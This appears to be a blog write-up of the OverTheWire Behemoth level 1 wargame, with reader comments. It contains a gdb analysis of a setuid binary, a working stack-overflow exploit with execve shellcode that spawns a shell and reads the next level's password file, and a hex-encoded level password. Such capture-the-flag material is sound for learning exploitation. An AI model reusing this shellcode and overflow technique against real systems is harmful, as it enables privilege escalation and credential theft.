# Behemoth wargame: Level 1

# ssh behemoth1@behemoth.labs.overthewire.org
behemoth1@behemoth.labs.overthewire.org's password:61657365626f6f746976

behemoth1@melissa$ file /behemoth/behemoth1
/behemoth/behemoth1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
behemoth1@melissa$ gdb -q /behemoth/behemoth1
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x080483f4 <+0>:     push   ebp
   0x080483f5 <+1>:     mov    ebp,esp
   0x080483f7 <+3>:     and    esp,0xfffffff0
   0x080483fa <+6>:     sub    esp,0x60
   0x080483fd <+9>:     mov    eax,0x80484f0
   0x08048402 <+14>:    mov    DWORD PTR [esp],eax
   0x08048405 <+17>:    call   0x8048320 
   0x0804840a <+22>:    lea    eax,[esp+0x1d]
   0x0804840e <+26>:    mov    DWORD PTR [esp],eax
   0x08048411 <+29>:    call   0x8048300 
   0x08048416 <+34>:    mov    DWORD PTR [esp],0x80484fc
   0x0804841d <+41>:    call   0x8048330 
   0x08048422 <+46>:    mov    eax,0x0
   0x08048427 <+51>:    leave
   0x08048428 <+52>:    ret
End of assembler dump.
(gdb) break *0x0804841d
Breakpoint 1 at 0x804841d
(gdb) run
Starting program: /behemoth/behemoth1
Password: aaa
Breakpoint 1, 0x0804841d in main ()
(gdb) print $esp+0x1d
$1 = (void *) 0xffffd6ed
(gdb) x/64xw $esp
0xffffd6d0:     0x080484fc      0x000a0000      0x00010000      0xf7fd2ff4
0xffffd6e0:     0xf7f80b19      0xf7ea2ab5      0xffffd6f8      0x61616165
0xffffd6f0:     0x00000000      0x08049600      0xffffd708      0x080482dc
0xffffd700:     0xf7fd2ff4      0x08049600      0xffffd738      0x08048449
0xffffd710:     0xf7ea2c3d      0xf7fd3324      0xf7fd2ff4      0xffffd738
0xffffd720:     0xf7ea2cb5      0xf7feed80      0x0804843b      0xf7fd2ff4
0xffffd730:     0x08048430      0x00000000      0xffffd7b8      0xf7e89e37
0xffffd740:     0x00000001      0xffffd7e4      0xffffd7ec      0xf7fdf420
0xffffd750:     0xffffffff      0xf7ffcff4      0x08048236      0x00000001
0xffffd760:     0xffffd7a0      0xf7fedd61      0xf7ffdad0      0xf7fd72e8
0xffffd770:     0x00000001      0xf7fd2ff4      0x00000000      0x00000000
0xffffd780:     0xffffd7b8      0x2dc68d1a      0x0353f50a      0x00000000
0xffffd790:     0x00000000      0x00000000      0x00000001      0x08048340
0xffffd7a0:     0x00000000      0xf7ff3f70      0xf7e89d5b      0xf7ffcff4
0xffffd7b0:     0x00000001      0x08048340      0x00000000      0x08048361
0xffffd7c0:     0x080483f4      0x00000001      0xffffd7e4      0x08048430
(gdb) print /x $ebp
$2 = 0xffffd738
(gdb) print 0xffffd73c-0xffffd6ed
$3 = 79
(gdb) quit
behemoth1@melissa$ (perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90"x53 . "\xfd\xd6\xff\xff"' ; cat ) | /behemoth/behemoth1
Password: Authentication failure.
/bin/cat /etc/behemoth_pass/behemoth2
behemoth1@melissa$ ln -s /etc/behemoth_pass/behemoth2 /tmp/b2p
behemoth1@melissa$ perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x2f\x62\x32\x70\x68\x2f\x74\x6d\x70\x89\xe1\x52\x89\xe2\x51\x53\x89\xe1\xcd\x80" . "\x90"x39 . "\xfd\xd6\xff\xff"' | /behemoth/behemoth1
Password: Authentication failure.


0xc said...

Why does the program exit immediately after the exec unless cat is piped in through a subshell?

alvin said...

Hi, why do you use the return address "\xcd\xd6\xff\xff" (0xffffd6cd) when the buffer that gets() writes into starts at 0xffffd6ed?